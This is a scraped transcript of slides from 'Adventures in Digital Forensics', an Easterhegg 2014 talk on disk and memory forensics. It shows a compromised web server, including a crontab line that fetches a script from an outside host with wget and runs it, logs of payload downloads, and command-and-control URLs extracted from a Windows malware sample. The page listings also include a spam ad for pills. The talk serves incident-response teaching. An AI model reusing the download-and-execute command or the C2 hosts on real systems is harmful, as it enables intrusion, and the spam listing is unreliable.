Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five years
Jacob Kaplan-Moss
 

Viewers also liked (17)

What's Next with Government Big Data
What's Next with Government Big Data What's Next with Government Big Data
What's Next with Government Big Data
 
Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resources
 
Web service overview
Web service overviewWeb service overview
Web service overview
 
缓存技术浅谈
缓存技术浅谈缓存技术浅谈
缓存技术浅谈
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
 
Social Networking
Social NetworkingSocial Networking
Social Networking
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software Público
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
 
Tomcat Maven Plugin
Tomcat Maven PluginTomcat Maven Plugin
Tomcat Maven Plugin
 
Nosotros Elmedio
Nosotros ElmedioNosotros Elmedio
Nosotros Elmedio
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ss
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
 
State of virtualisation -- 2012
State of virtualisation -- 2012State of virtualisation -- 2012
State of virtualisation -- 2012
 
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five years
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Recently uploaded (20)

Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 

Adventures in Digital Forensics

  • 2. xhr Easterhegg 2014 2 $ whoami
  • 3. xhr Easterhegg 2014 3 What is Digital Forensics?
  • 4. xhr Easterhegg 2014 4 What the media thinks...
  • 5. xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
  • 6. xhr Easterhegg 2014 6 What it is really about ...
  • 7. xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
  • 8. xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
  • 9. xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
  • 10. xhr Easterhegg 2014 11 Learn new Things[TM]
  • 11. xhr Easterhegg 2014 12 Two Approaches
  • 12. xhr Easterhegg 2014 13 Disc Forensics
  • 13. xhr Easterhegg 2014 14 Memory Forensics
  • 14. xhr Easterhegg 2014 15 Post-mortem Analysis
  • 15. xhr Easterhegg 2014 16 MAC Time Analysis
  • 16. xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
  • 17. xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 18. xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
  • 19. xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 20. xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
  • 21. xhr Easterhegg 2014 22 On-disk Analysis
  • 22. xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
  • 23. xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
  • 24. xhr Easterhegg 2014 25 Log Files
  • 25. xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 26. xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 27. xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 28. xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
  • 29. xhr Easterhegg 2014 30 Write Remote Logs!!1
  • 30. xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
  • 31. xhr Easterhegg 2014 32 Memory Forensics 101
  • 32. xhr Easterhegg 2014 33 Mem dump == IDDQD
  • 33. xhr Easterhegg 2014 34 Linux → Windows
  • 34. xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
  • 35. xhr Easterhegg 2014 36 Check Networking
  • 36. xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 37. xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
  • 38. xhr Easterhegg 2014 39 Check IE History
  • 39. xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
  • 40. xhr Easterhegg 2014 42 Any Malicious Processes?
  • 41. xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 42. xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 43. xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
  • 44. xhr Easterhegg 2014 46 Process Dump
  • 46. xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
  • 47. xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4 